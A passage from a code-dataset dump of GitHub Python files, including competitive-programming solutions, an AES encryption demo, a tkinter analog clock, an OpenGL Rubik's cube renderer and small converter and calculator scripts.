:: System Administrators\",\n \"Topic :: Software Development :: Build Tools\",\n \"Topic :: Software Development :: Testing\",\n \"License :: OSI Approved :: GNU General Public License v2 (GPLv2)\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: POSIX\",\n \"Programming Language :: C\",\n \"Programming Language :: C++\",\n \"Programming Language :: Java\",\n \"Programming Language :: JavaScript\",\n \"Programming Language :: Python :: 3\",\n ],\n keywords=[\n \"bazel\",\n \"build\",\n \"cmake\",\n \"conan\",\n \"jolt\",\n \"make\",\n \"meson\",\n \"msbuild\",\n \"xcode\",\n ],\n packages=find_packages(exclude=[\"contrib\", \"docs\", \"tests\"]),\n install_requires=pinned_reqs or [\n \"bz2file\",\n \"click>=8.1\",\n \"colorama\",\n \"fasteners\",\n \"jinja2\",\n \"keyring\",\n \"keyrings.alt\",\n \"lxml\",\n \"multi_key_dict\",\n \"ninja-syntax\",\n \"psutil\",\n \"pygit2\",\n \"requests\",\n \"tqdm\",\n ],\n dependency_links=[],\n extras_require={\n \"allure\": [\"allure-python-commons\"],\n \"amqp\": [\"pika\"],\n \"conan\": [\"conan<2.0\"],\n \"dev\": [\"check-manifest\"],\n \"doc\": [\"sphinx-click\", \"sphinx-rtd-theme\"],\n \"test\": [\"coverage\"],\n },\n package_data={\n \"jolt\": [\"**/*.sh\", \"**/*.xslt\", \"**/*.template\"],\n },\n entry_points={\n \"console_scripts\": [\n \"jolt=jolt.__main__:main\",\n ],\n },\n)\n","repo_name":"srand/jolt","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"40"} +{"seq_id":"7657720849","text":"# 10814번 나이순 정렬\r\nN = int(input())\r\n\r\nli = [tuple(input().split()) for _ in range(N)]\r\nli = [(int(age), name) for age, name in li]\r\n\r\nli.sort(key=lambda x : x[0])\r\n\r\nfor x, y in li:\r\n print(x,y)","repo_name":"hmnd1257/BOJ","sub_path":"백준/Silver/10814. 나이순 정렬/나이순 정렬.py","file_name":"나이순 정렬.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73851717879","text":"import sys\r\nimport math\r\ndef extendedEuclidean(a, b):\r\n x0, x1, y0, y1 = 1, 0, 0, 1\r\n while b != 0:\r\n n, a, b = a // b, b, a % b\r\n x0, x1 = x1, x0 - n * x1\r\n y0, y1 = y1, y0 - n * y1\r\n return x0, y0\r\n\r\nn = int(sys.stdin.readline())\r\nfor i in range(n):\r\n a, b = map(int, sys.stdin.readline().split())\r\n if b == 1:\r\n if a + 1 > 10 ** 9:\r\n print(\"IMPOSSIBLE\")\r\n else:\r\n print(a + 1)\r\n continue\r\n if a == 1:\r\n print(1)\r\n continue\r\n x0, y0 = extendedEuclidean(a, b)\r\n if a * x0 + b * y0 == 1 and y0 <= 10 ** 9:\r\n if y0 >= 0:\r\n print(y0)\r\n else:\r\n print(a + y0)\r\n else:\r\n print(\"IMPOSSIBLE\")","repo_name":"H3LLO-kr/BAEKJOON","sub_path":"Python/BOJ_3955.py","file_name":"BOJ_3955.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38931945838","text":"from Crypto.Cipher import AES\r\nfrom Crypto.Random import get_random_bytes\r\n\r\ndef pad(text):\r\n \"\"\"Thêm byte để đảm bảo độ dài của văn bản là bội số của 16\"\"\"\r\n return text + b\"\\0\" * (AES.block_size - len(text) % AES.block_size)\r\n\r\ndef encrypt(key, plaintext):\r\n \"\"\"Mã hóa văn bản bằng AES với khóa đã cho\"\"\"\r\n plaintext = pad(plaintext)\r\n iv = get_random_bytes(AES.block_size) # Tạo một vectơ khởi đầu ngẫu nhiên\r\n cipher = AES.new(key, AES.MODE_CBC, iv)\r\n ciphertext = cipher.encrypt(plaintext)\r\n return iv + ciphertext\r\n\r\ndef decrypt(key, ciphertext):\r\n \"\"\"Giải mã văn bản bằng AES với khóa đã cho\"\"\"\r\n iv = ciphertext[:AES.block_size] # Lấy vectơ khởi đầu từ đầu mã hóa\r\n ciphertext = ciphertext[AES.block_size:] # Lấy phần còn lại của mã hóa\r\n cipher = AES.new(key, AES.MODE_CBC, iv)\r\n plaintext = cipher.decrypt(ciphertext)\r\n return plaintext.rstrip(b\"\\0\")\r\n\r\n# Sử dụng ví dụ mã hóa và giải mã\r\nif __name__ == \"__main__\":\r\n key = b\"ledinhthuc123456\" # Đây là một khóa AES hợp lệ có độ dài 16 byte (128 bit)\r\n plaintext = b\"Hello, World!\" # Văn bản cần được mã hóa\r\n print(type(plaintext))\r\n\r\n # Mã hóa văn bản\r\n ciphertext = encrypt(key, plaintext)\r\n print(\"Ciphertext:\", ciphertext)\r\n\r\n # Giải mã văn bản\r\n decrypted_text = decrypt(key, ciphertext)\r\n print(\"Decrypted text:\", decrypted_text)\r\n","repo_name":"Jackson2706/BTL_LTMM","sub_path":"AES/AES.py","file_name":"AES.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35010671119","text":"\"\"\"Task\nYou are given a string. Split the string on a \" \" (space) delimiter and join using a - hyphen.\n\nFunction Description\n\nComplete the split_and_join function in the editor below.\n\nsplit_and_join has the following parameters:\n\nstring line: a string of space-separated words\nReturns\n\nstring: the resulting string\nInput Format\nThe one line contains a string consisting of space separated words.\n\nSample Input\n\nthis is a string \nSample Output\n\nthis-is-a-string \"\"\"\n\n\ndef split_and_join(line):\n \n newlist = line.split()\n joinnedList = \"\"\n\n for i in range(0,len(newlist)):\n if i != len(newlist)-1:\n newlist[i] = newlist[i] + \"-\"\n print(i)\n print(\"item \" + newlist[i])\n joinnedList = joinnedList + newlist[i] \n print(\"joinnedList\" , joinnedList )\n\n return joinnedList\n \n\nline = input()\nresult = split_and_join(line)\nprint(result)\n \n\n","repo_name":"Arunpmohanan/python","sub_path":"python/basics/Stringsplit.py","file_name":"Stringsplit.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9251378985","text":"try:\n\timport Tkinter\nexcept:\n\timport tkinter as Tkinter\n\nimport math\t# Required For Coordinates Calculation\nimport time\t# Required For Time Handling\n#\n#\n# class\nclass main(Tkinter.Tk):\n\tdef __init__(self):\n\t\tTkinter.Tk.__init__(self)\n\t\tself.x=150\t# Center Point x\n\t\tself.y=150\t# Center Point\n\t\tself.length=50\t# Stick Length\n\t\tself.creating_all_function_trigger()\n\n\t# Creating Trigger For Other Functions\n\tdef creating_all_function_trigger(self):\n\t\tself.create_canvas_for_shapes()\n\t\tself.creating_background_()\n\t\tself.creating_sticks()\n\t\treturn\n\n\t# Creating Background\n\tdef creating_background_(self):\n\t\tself.image=Tkinter.PhotoImage(file='clock.gif')\n\t\tself.canvas.create_image(150,150, image=self.image)\n\t\treturn\n\n\t# creating Canvas\n\tdef create_canvas_for_shapes(self):\n\t\tself.canvas=Tkinter.Canvas(self, bg='black')\n\t\tself.canvas.pack(expand='yes',fill='both')\n\t\treturn\n\n\t# Creating Moving Sticks\n\tdef creating_sticks(self):\n\t\tself.sticks=[]\n\t\tfor i in range(3):\n\t\t\tstore=self.canvas.create_line(self.x, self.y,self.x+self.length,self.y+self.length,width=2, fill='red')\n\t\t\tself.sticks.append(store)\n\t\treturn\n\n\t# Function Need Regular Update\n\tdef update_class(self):\n\t\tnow=time.localtime()\n\t\tt = time.strptime(str(now.tm_hour), \"%H\")\n\t\thour = int(time.strftime( \"%I\", t ))*5\n\t\tnow=(hour,now.tm_min,now.tm_sec)\n\t\t# Changing Stick Coordinates\n\t\tfor n,i in enumerate(now):\n\t\t\tx,y=self.canvas.coords(self.sticks[n])[0:2]\n\t\t\tcr=[x,y]\n\t\t\tcr.append(self.length*math.cos(math.radians(i*6)-math.radians(90))+self.x)\n\t\t\tcr.append(self.length*math.sin(math.radians(i*6)-math.radians(90))+self.y)\n\t\t\tself.canvas.coords(self.sticks[n], tuple(cr))\n\t\treturn\n\n# Main Function Trigger\nif __name__ == '__main__':\n\troot=main()\n\n\t# Creating Main Loop\n\twhile True:\n\t\troot.update()\n\t\troot.update_idletasks()\n\t\troot.update_class()\n","repo_name":"dixitt5/CP-Solutions","sub_path":"Python programs/analogClock.py","file_name":"analogClock.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"40"} +{"seq_id":"15918880237","text":"\"\"\" cube\nOriginal PyCube written by Michael King\n\nBased and modified from original version found at:\nhttp://stackoverflow.com/questions/30745703/rotating-a-cube-using-quaternions-in-pyopengl\n\"\"\"\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GLUT import *\n\nimport math\nimport numpy as np\nfrom queue import Queue\n\nfrom enums import FaceRotation\nfrom geometry import Geometry\nfrom helpers import LittleHelpers\nfrom mathf import Mathf\nfrom quat import *\nfrom tween import *\n\nclass State(Enum):\n IDLE = 0\n TWEENING = 1\n\nclass Cube:\n def __init__(self, settings, face_rotation_ease_type, sticker_texture_id, size=3):\n default_color = (0, 0, 0)\n self.padding = settings.cube_padding\n self.draw_cubies = settings.cube_draw_cubies\n self.draw_sphere = settings.cube_draw_sphere\n self.draw_lines = settings.cube_draw_lines\n self.line_width = settings.cube_line_width\n self.inner_color = LittleHelpers.convert_hex_color_to_floats(settings.cube_inner_color, default_color)\n self.sphere_color = LittleHelpers.convert_hex_color_to_floats(settings.cube_sphere_color, default_color)\n self.angular_drag = settings.cube_angular_drag\n self.scale_drag = settings.cube_scale_drag\n self.min_scale = settings.cube_min_scale/size\n self.max_scale = settings.cube_max_scale\n\n self.size = size\n\n self.rot_x = 0\n self.rot_y = 0\n self.accum = (1, 0, 0, 0)\n\n self.scale = 1/(self.size/3)\n self.scale_speed = 0\n self.sphere_radius = 3\n self.sphere_slices = 16\n self.sphere_stacks = 16\n\n self.face_rotation_tween_time = settings.cube_face_rotation_tween_time\n self.face_rotation_ease_type = face_rotation_ease_type\n self.texture_mapping_enabled = settings.texture_mapping_enabled\n self.sticker_texture_id = sticker_texture_id\n\n self.geometry = Geometry(self.size)\n self.face_colors = (\n (0, 154/255, 74/255), # Front: Green\n (1, 86/255, 35/255), # Left: Orange\n (0, 75/255, 171/255), # Back: Blue\n (190/255, 15/255, 56/255), # Right: Red\n (1, 1, 1), # Up: White\n (1, 210/255, 44/255), # Down: Yellow\n )\n self.reset()\n\n rx = settings.cube_initial_rotation_x * Mathf.DEG_TO_RAD\n ry = settings.cube_initial_rotation_y * Mathf.DEG_TO_RAD\n self.apply_rotation(rx, ry, settings.rotate_y_before_x_initially)\n\n # auto-rotation\n repeat = True\n repetion_count = -1\n\n if settings.cube_auto_rot_x_enabled:\n begin = settings.cube_auto_rot_x_begin\n end = settings.cube_auto_rot_x_end\n jump_start = settings.cube_auto_rot_x_jump_start\n ease = Tween.get_ease_type_by_name(settings.cube_auto_rot_x_ease_type)\n self.auto_rot_x = Tween()\n self.auto_rot_x.tween(begin, end, time, ease, repeat, repetition_count, jump_start)\n else:\n self.auto_rot_x = False\n\n if settings.cube_auto_rot_y_enabled:\n begin = settings.cube_auto_rot_y_begin\n end = settings.cube_auto_rot_y_end\n time = settings.cube_auto_rot_y_time\n jump_start = settings.cube_auto_rot_y_jump_start\n ease = Tween.get_ease_type_by_name(settings.cube_auto_rot_y_ease_type)\n self.auto_rot_y = Tween()\n self.auto_rot_y.tween(begin, end, time, ease, repeat, repetition_count, jump_start)\n else:\n self.auto_rot_y = False\n\n def reset(self):\n self.geometry = Geometry(self.size)\n self.geometry.add_padding(self.padding)\n self.queued_face_rotations = Queue(0)\n self.tween = Tween()\n self.state = State.IDLE\n self.current_face_rotation = None\n\n def apply_rotation(self, x, y, rotate_y_before_x=False):\n qx = normalize(axisangle_to_q((1, 0, 0), x))\n qy = normalize(axisangle_to_q((0, 1, 0), y))\n if rotate_y_before_x:\n self.accum = q_mult(self.accum, qy)\n self.accum = q_mult(self.accum, qx)\n else:\n self.accum = q_mult(self.accum, qx)\n self.accum = q_mult(self.accum, qy)\n\n def update(self, elapsed_time):\n self.rot_x -= abs(self.rot_x) * self.angular_drag * elapsed_time * np.sign(self.rot_x)\n self.rot_y -= abs(self.rot_y) * self.angular_drag * elapsed_time * np.sign(self.rot_y)\n\n qx = normalize(axisangle_to_q((1, 0, 0), self.rot_x))\n qy = normalize(axisangle_to_q((0, 1, 0), self.rot_y))\n\n self.accum = q_mult(self.accum, qx)\n self.accum = q_mult(self.accum, qy)\n\n self.scale_speed -= abs(self.scale_speed) * self.scale_drag * elapsed_time * np.sign(self.scale_speed)\n self.scale += self.scale_speed\n if self.scale < self.min_scale:\n self.scale = self.min_scale\n self.scale_speed = 0\n if self.scale > self.max_scale:\n self.scale = self.max_scale\n self.scale_speed = 0\n\n self.update_queue()\n self.update_tween(elapsed_time)\n self.update_face_tweening()\n if self.auto_rot_x: self.auto_rot_x.update(elapsed_time)\n if self.auto_rot_y: self.auto_rot_y.update(elapsed_time)\n\n def render(self):\n # glPushMatrix()\n glLoadMatrixf(q_to_mat4(self.accum))\n glScalef(self.scale, self.scale, self.scale)\n\n if self.auto_rot_x:\n rot_x = self.auto_rot_x.get_current()\n glRotatef(rot_x, 1, 0, 0)\n if self.auto_rot_y:\n rot_y = self.auto_rot_y.get_current()\n glRotatef(rot_y, 0, 1, 0)\n\n if self.draw_sphere: self.render_sphere()\n if self.draw_cubies:\n if self.texture_mapping_enabled:\n self.render_cubies_with_textures()\n else:\n self.render_cubies()\n if self.draw_lines: self.render_lines()\n # glPopMatrix()\n\n def add_rotate_x(self, value): self.rot_x += value\n def add_rotate_y(self, value): self.rot_y += value\n def add_scale(self, value):\n self.scale_speed += value\n\n def reset_rotation(self):\n self.rot_x = 0\n self.rot_y = 0\n self.accum = (1, 0, 0, 0)\n\n def reset_scale(self): self.scale = 1\n\n def stop_rotation(self):\n self.rot_x = 0\n self.rot_y = 0\n\n def append_face_rotation(self, face_rotation):\n if type(face_rotation) == FaceRotation:\n self.queued_face_rotations.put(face_rotation)\n\n def scramble(self, face_rotations):\n theta = math.pi / 2\n for face in face_rotations:\n self.rotate_face(face, theta)\n\n def map_colors(self, front_color, back_color, left_color, right_color, up_color, down_color):\n self.face_colors = (front_color, left_color, back_color, right_color, up_color, down_color)\n\n def update_queue(self):\n if self.state == State.TWEENING or self.queued_face_rotations.empty(): return\n self.current_face_rotation = self.queued_face_rotations.get_nowait()\n self.state = State.TWEENING\n self.tween.tween(0, math.pi/2, self.face_rotation_tween_time, self.face_rotation_ease_type)\n\n def update_tween(self, elapsed_time):\n if self.state != State.TWEENING: return\n\n if self.tween.is_done():\n self.state = State.IDLE\n self.current_face_rotation = None\n else:\n self.tween.update(elapsed_time)\n\n def update_face_tweening(self):\n theta = self.tween.get_delta()\n self.rotate_face(self.current_face_rotation, theta)\n\n def rotate_face(self, face, theta):\n if (face == FaceRotation.FRONT_CW or\n face == FaceRotation.BACK_CCW or\n face == FaceRotation.LEFT_CCW or\n face == FaceRotation.RIGHT_CW or\n face == FaceRotation.UP_CW or\n face == FaceRotation.DOWN_CCW):\n theta *= -1\n if face == FaceRotation.FRONT_CW or face == FaceRotation.FRONT_CCW:\n self.rotate_front_face(theta)\n if face == FaceRotation.BACK_CW or face == FaceRotation.BACK_CCW:\n self.rotate_back_face(theta)\n if face == FaceRotation.LEFT_CW or face == FaceRotation.LEFT_CCW:\n self.rotate_left_face(theta)\n if face == FaceRotation.RIGHT_CW or face == FaceRotation.RIGHT_CCW:\n self.rotate_right_face(theta)\n if face == FaceRotation.UP_CW or face == FaceRotation.UP_CCW:\n self.rotate_up_face(theta)\n if face == FaceRotation.DOWN_CW or face == FaceRotation.DOWN_CCW:\n self.rotate_down_face(theta)\n\n def rotate_front_face(self, theta, layer=1):\n for pieces in self.geometry.center_pieces[0]:\n for piece in pieces:\n for i in range(8):\n piece[i] = z_rot(piece[i], theta)\n #self.geometry.center_pieces[0][i] = z_rot(self.geometry.center_pieces[0][i], theta)\n for axis in self.geometry.edge_pieces:\n for pieces in axis:\n for piece in pieces:\n flag = True\n for vertex in piece:\n if vertex[2] < (self.size-1) - (layer*2):\n #if vertex[2] < 0:\n flag = False\n break\n if flag:\n for i in range(8):\n piece[i] = z_rot(piece[i], theta)\n for piece in self.geometry.corner_pieces:\n flag = True\n for vertex in piece:\n if vertex[2] < 0:\n flag = False\n break\n if flag:\n for i in range(8):\n piece[i] = z_rot(piece[i], theta)\n\n def rotate_back_face(self, theta, layer=1):\n for pieces in self.geometry.center_pieces[2]:\n for piece in pieces:\n for i in range(8):\n piece[i] = z_rot(piece[i], theta)\n #self.geometry.center_pieces[2][i] = z_rot(self.geometry.center_pieces[2][i], theta)\n for axis in self.geometry.edge_pieces:\n for pieces in axis:\n for piece in pieces:\n flag = True\n for vertex in piece:\n #if vertex[2] > 0:\n if vertex[2] > (-self.size+1) + (layer*2): # or vertex[2] > (-self.size-1) + (layer*2):\n flag = False\n break\n if flag:\n for i in range(8):\n piece[i] = z_rot(piece[i], theta)\n for piece in self.geometry.corner_pieces:\n flag = True\n for vertex in piece:\n if vertex[2] > 0:\n flag = False\n break\n if flag:\n for i in range(8):\n piece[i] = z_rot(piece[i], theta)\n\n def rotate_left_face(self, theta, layer=1):\n for pieces in self.geometry.center_pieces[1]:\n for piece in pieces:\n for i in range(8):\n piece[i] = x_rot(piece[i], theta)\n #self.geometry.center_pieces[1][i] = x_rot(self.geometry.center_pieces[1][i], theta)\n for axis in self.geometry.edge_pieces:\n for pieces in axis:\n for piece in pieces:\n flag = True\n for vertex in piece:\n #if vertex[0] > 0:\n if vertex[0] > (-self.size+1) + (layer*2):\n flag = False\n break\n if flag:\n for i in range(8):\n piece[i] = x_rot(piece[i], theta)\n for piece in self.geometry.corner_pieces:\n flag = True\n for vertex in piece:\n if vertex[0] > 0:\n flag = False\n break\n if flag:\n for i in range(8):\n piece[i] = x_rot(piece[i], theta)\n\n def rotate_right_face(self, theta, layer=1):\n for pieces in self.geometry.center_pieces[3]:\n for piece in pieces:\n for i in range(8):\n piece[i] = x_rot(piece[i], theta)\n #self.geometry.center_pieces[3][i] = x_rot(self.geometry.center_pieces[3][i], theta)\n for axis in self.geometry.edge_pieces:\n for pieces in axis:\n for piece in pieces:\n flag = True\n for vertex in piece:\n #if vertex[0] < 0:\n if vertex[0] < (self.size-1) - (layer*2):\n flag = False\n break\n if flag:\n for i in range(8):\n piece[i] = x_rot(piece[i], theta)\n for piece in self.geometry.corner_pieces:\n flag = True\n for vertex in piece:\n if vertex[0] < 0:\n flag = False\n if flag:\n for i in range(8):\n piece[i] = x_rot(piece[i], theta)\n\n def rotate_up_face(self, theta, layer=1):\n for pieces in self.geometry.center_pieces[4]:\n for piece in pieces:\n for i in range(8):\n piece[i] = y_rot(piece[i], theta)\n #self.geometry.center_pieces[4][i] = y_rot(self.geometry.center_pieces[4][i], theta)\n for axis in self.geometry.edge_pieces:\n for pieces in axis:\n for piece in pieces:\n flag = True\n for vertex in piece:\n #if vertex[1] < 0:\n if vertex[1] < (self.size-1) - (layer*2):\n #if vertex[1] < self.size - layer*2:\n flag = False\n break\n if flag:\n for i in range(8):\n piece[i] = y_rot(piece[i], theta)\n for piece in self.geometry.corner_pieces:\n flag = True\n for vertex in piece:\n if vertex[1] < 0:\n flag = False\n break\n if flag:\n for i in range(8):\n piece[i] = y_rot(piece[i], theta)\n\n def rotate_down_face(self, theta, layer=1):\n for pieces in self.geometry.center_pieces[5]:\n for piece in pieces:\n for i in range(8):\n piece[i] = y_rot(piece[i], theta)\n #self.geometry.center_pieces[5][i] = y_rot(self.geometry.center_pieces[5][i], theta)\n for axis in self.geometry.edge_pieces:\n for pieces in axis:\n for piece in pieces:\n flag = True\n for vertex in piece:\n #if vertex[1] > 0:\n if vertex[1] > (-self.size+1) + (layer*2):\n #if vertex[1] > -self.size + layer*2:\n flag = False\n break\n if flag:\n for i in range(8):\n piece[i] = y_rot(piece[i], theta)\n for piece in self.geometry.corner_pieces:\n flag = True\n for vertex in piece:\n if vertex[1] > 0:\n flag = False\n break\n if flag:\n for i in range(8):\n piece[i] = y_rot(piece[i], theta)\n\n def render_sphere(self):\n glColor3f(self.sphere_color[0], self.sphere_color[1], self.sphere_color[2])\n glutSolidSphere(self.sphere_radius, self.sphere_slices, self.sphere_stacks)\n\n def render_axes(self):\n glLineWidth(1)\n glBegin(GL_LINES)\n for color, axis in zip(self.geometry.axis_colors, self.geometry.axes):\n glColor3f(color[0], color[1], color[2])\n for point in axis:\n p = self.geometry.axis_verts[point]\n glVertex3f(p[0], p[1], p[2])\n glEnd()\n\n def render_lines(self):\n print('render lines')\n glLineWidth(self.line_width)\n glColor3f(0, 0, 0)\n glBegin(GL_LINES)\n for axis in self.geometry.edge_pieces:\n for piece in axis:\n for edge in self.geometry.cube_edges:\n for vertex in edge:\n v = piece[vertex]\n glVertex3f(v[0], v[1], v[2])\n for piece in self.geometry.center_pieces:\n for edge in self.geometry.cube_edges:\n for vertex in edge:\n v = piece[vertex]\n glVertex3f(v[0], v[1], v[2])\n glEnd()\n\n def render_cubies(self):\n inner_color = self.inner_color\n\n glBegin(GL_QUADS)\n\n # render center pieces\n i = 0\n for color, surface in zip(self.face_colors, self.geometry.cube_surfaces):\n glColor3f(color[0], color[1], color[2])\n for vertex in surface:\n v = self.geometry.center_pieces[i][vertex]\n glVertex3f(v[0], v[1], v[2])\n j = 0\n for piece in self.geometry.center_pieces:\n glColor3f(inner_color[0], inner_color[1], inner_color[2])\n for vertex in surface:\n v = self.geometry.center_pieces[j][vertex]\n glVertex3f(v[0], v[1], v[2])\n j += 1\n i += 1\n\n # render edge pieces\n for color, surface, face in zip(self.face_colors, self.geometry.cube_surfaces, self.geometry.edges):\n glColor3f(color[0], color[1], color[2])\n for piece_index in face:\n for piece in self.geometry.edge_pieces[piece_index[0]][piece_index[1]]:\n for vertex in surface:\n p = piece[vertex]\n #p = self.geometry.edge_pieces[piece[0]][piece[1]][vertex]\n glVertex3f(p[0], p[1], p[2])\n glColor3f(inner_color[0], inner_color[1], inner_color[2])\n for i in range(len(self.geometry.edge_black_pat)):\n for face in self.geometry.edge_black_pat[i]:\n for pieces in self.geometry.edge_pieces[i]:\n for piece in pieces:\n for vertex in self.geometry.cube_surfaces[face]:\n v = piece[vertex]\n glVertex3f(v[0], v[1], v[2])\n\n # render corner pieces\n for i in range(len(self.geometry.corner_black_pat)):\n for face in self.geometry.corner_color_pat[i]:\n color = self.face_colors[face]\n glColor3f(color[0], color[1], color[2])\n for vertex in self.geometry.cube_surfaces[face]:\n v = self.geometry.corner_pieces[i][vertex]\n glVertex3f(v[0], v[1], v[2])\n glColor3f(inner_color[0], inner_color[1], inner_color[2])\n for i in range(len(self.geometry.corner_black_pat)):\n for face in self.geometry.corner_black_pat[i]:\n for vertex in self.geometry.cube_surfaces[face]:\n v = self.geometry.corner_pieces[i][vertex]\n glVertex3f(v[0], v[1], v[2])\n glEnd()\n\n def render_cubies_with_textures(self):\n tex_coords = self.geometry.tex_coords\n inner_color = self.inner_color\n\n # render outer faces with an applied texture\n glBindTexture(GL_TEXTURE_2D, self.sticker_texture_id)\n glBegin(GL_QUADS)\n\n # render center pieces\n i = 0\n for color, surface in zip(self.face_colors, self.geometry.cube_surfaces):\n glColor3f(color[0], color[1], color[2])\n #ti = 0\n for pieces in self.geometry.center_pieces[i]:\n for piece in pieces:\n ti = 0\n for vertex in surface:\n v = piece[vertex]\n glVertex3f(v[0], v[1], v[2])\n glTexCoord2f(tex_coords[ti][0], tex_coords[ti][1])\n ti += 1\n i += 1\n\n # render edge pieces\n for color, surface, face in zip(self.face_colors, self.geometry.cube_surfaces, self.geometry.edges):\n glColor3f(color[0], color[1], color[2])\n for piece_index in face:\n # ti = 0\n for piece in self.geometry.edge_pieces[piece_index[0]][piece_index[1]]:\n ti = 0\n for vertex in surface:\n p = piece[vertex]\n #p = self.geometry.edge_pieces[piece[0]][piece[1]][vertex]\n glVertex3f(p[0], p[1], p[2])\n glTexCoord2f(tex_coords[ti][0], tex_coords[ti][1])\n ti += 1\n\n # render corner pieces\n for i in range(len(self.geometry.corner_color_pat)):\n for face in self.geometry.corner_color_pat[i]:\n color = self.face_colors[face]\n glColor3f(color[0], color[1], color[2])\n ti = 0\n for vertex in self.geometry.cube_surfaces[face]:\n v = self.geometry.corner_pieces[i][vertex]\n glVertex3f(v[0], v[1], v[2])\n glTexCoord2f(tex_coords[ti][0], tex_coords[ti][1])\n ti += 1\n glEnd()\n\n # render inner faces without texture using only the inner color\n glBindTexture(GL_TEXTURE_2D, 0)\n glBegin(GL_QUADS)\n\n # render center pieces\n i = 0\n for color, surface in zip(self.face_colors, self.geometry.cube_surfaces):\n j = 0\n for pieces in self.geometry.center_pieces[i]:\n j = 0\n for piece in pieces:\n glColor3f(inner_color[0], inner_color[1], inner_color[2])\n for vertex in surface:\n v = piece[vertex]\n glVertex3f(v[0], v[1], v[2])\n j += 1\n i += 1\n\n # render edge pieces\n glColor3f(inner_color[0], inner_color[1], inner_color[2])\n for i in range(len(self.geometry.edge_black_pat)):\n for face in self.geometry.edge_black_pat[i]:\n for pieces in self.geometry.edge_pieces[i]:\n for piece in pieces:\n for vertex in self.geometry.cube_surfaces[face]:\n v = piece[vertex]\n glVertex3f(v[0], v[1], v[2])\n\n # render corner pieces\n glColor3f(inner_color[0], inner_color[1], inner_color[2])\n for i in range(len(self.geometry.corner_black_pat)):\n for face in self.geometry.corner_black_pat[i]:\n for vertex in self.geometry.cube_surfaces[face]:\n v = self.geometry.corner_pieces[i][vertex]\n glVertex3f(v[0], v[1], v[2])\n glEnd()\n","repo_name":"randomfox/PyRubixsCube","sub_path":"cube.py","file_name":"cube.py","file_ext":"py","file_size_in_byte":23109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18508064500","text":"import time\r\n\r\ndef Main(): \r\n modeSelect = str.upper(input(\"\"\"Please select a mode: \r\n(1) Binary\r\n(2) Hex\r\n(3) Text\r\nSelection: \"\"\"))\r\n \r\n conversionString = input(\"Please enter the string to convert: \") \r\n if modeSelect in [\"1\", \"BINARY\"]: convertedString=Binary(conversionString, convertedString=\"\")\r\n elif modeSelect in [\"2\", \"HEX\"]: convertedString=Hex(conversionString, convertedString=\"\")\r\n elif modeSelect in [\"3\", \"TEXT\"]: convertedString=Text(conversionString, convertedString=\"\")\r\n else: \r\n print(\"Error: Invalid mode selected.\")\r\n Main()\r\n \r\n print(f\"Your converted string is: {convertedString}\")\r\n time.sleep(2); print(\"\\n\")\r\n\r\ndef Binary(conversionString, convertedString):\r\n for char in conversionString:\r\n if char in [\"0\", \"1\"]:\r\n if char == \"0\": convertedString+=\"1\"\r\n else: convertedString+=\"0\"\r\n else:\r\n print(\"Error: Ensure your string is valid for method of conversion.\")\r\n Main()\r\n return convertedString\r\n\r\ndef Hex(conversionString, convertedString):\r\n try: \r\n conversionString = str(bin(int(conversionString, 16)))\r\n except:\r\n print(\"Error: Ensure your string is valid for method of conversion.\")\r\n Main()\r\n for char in conversionString[2:]:\r\n if char in [\"0\", \"1\"]:\r\n if char == \"0\": convertedString+=\"1\"\r\n else: convertedString+=\"0\"\r\n else:\r\n print(\"Error: Something went wrong during hex to binary conversion.\")\r\n Main()\r\n convertedString = hex(int(convertedString, 2))\r\n return convertedString[2:].upper()\r\n\r\ndef Text(conversionString, convertedString):\r\n convertedStringHex = \"\"\r\n for char in conversionString:\r\n tempString = \"\"\r\n binChar = str(bin(ord(char)))[2:].zfill(8)\r\n for char in binChar:\r\n if char == \"0\": tempString+=\"1\"\r\n else: tempString+=\"0\"\r\n convertedString+=chr(int(tempString, 2))\r\n convertedStringHex+=hex(int(tempString, 2))[2:].upper()+\" \"\r\n print(f\"Your converted string in Hexadecimal is: {convertedStringHex}\")\r\n return convertedString\r\n\r\nwhile True:\r\n if __name__ == \"__main__\":\r\n print(\"\"\"-----------------------------------------------------\r\nWelcome to the NOT Converter; Created by Logan Heath.\r\n-----------------------------------------------------\"\"\")\r\n Main()","repo_name":"JustAHubber/Scripts","sub_path":"Logic Converters/NOT Converter/NOT Converter.py","file_name":"NOT Converter.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"40339200502","text":"while True:\n # Nhập a và b từ bàn phím\n a = float(input(\"a=\"))\n b = float(input(\"b=\"))\n\n # Nhập toán tử từ bàn phím\n operator = input(\"Nhập toán tử (+, -, *, /): \")\n\n # Tính toán và in kết quả\n if operator == '+':\n print(f\"{a}+{int(b)}={a + b}\")\n elif operator == '-':\n print(f\"{a}-{int(b)}={a - b}\")\n elif operator == '*':\n print(f\"{a}*{int(b)}={a * b}\")\n elif operator == '/':\n if b == 0:\n print(\"Không thể chia cho 0!\")\n else:\n print(f\"{a}/{int(b)}={a / b}\")\n else:\n print(\"Toán tử không hợp lệ!\")\n\n # Hỏi người dùng có muốn tiếp tục tính toán hay không\n choice = input(\"Tiep tuc:\")\n if choice.lower() == 't':\n break\n","repo_name":"kingofforeverr/vantuan","sub_path":"Chuong3/baitapontapchuongphan2/41_bai4.py","file_name":"41_bai4.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71829887479","text":"import requests, time, 